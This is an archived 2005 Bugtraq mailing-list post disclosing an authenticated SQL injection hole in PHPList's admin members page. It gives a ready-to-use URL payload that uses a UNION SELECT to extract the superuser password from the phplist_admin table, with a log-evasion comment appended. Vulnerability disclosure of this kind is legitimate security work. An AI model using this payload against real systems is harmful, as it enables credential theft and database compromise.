[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHPList Vunerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPList Vunerability
From: ziot@xxxxxxxxxxxxxxx
Date: 31 Jul 2005 23:02:38 -0000

http://example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password

Although not completely open because one must authenticate, but completely 
leaves the database open.. thus being a SQL Injection hole.

Prev by Date: The Java applet sandbox and stateful firewalls
Next by Date: Buffer overflow in BusinessMail email server system 4.60.00
Previous by thread: Re: [VulnWatch] The Java applet sandbox and stateful firewalls
Next by thread: Buffer overflow in BusinessMail email server system 4.60.00
Index(es):
- Date
- Thread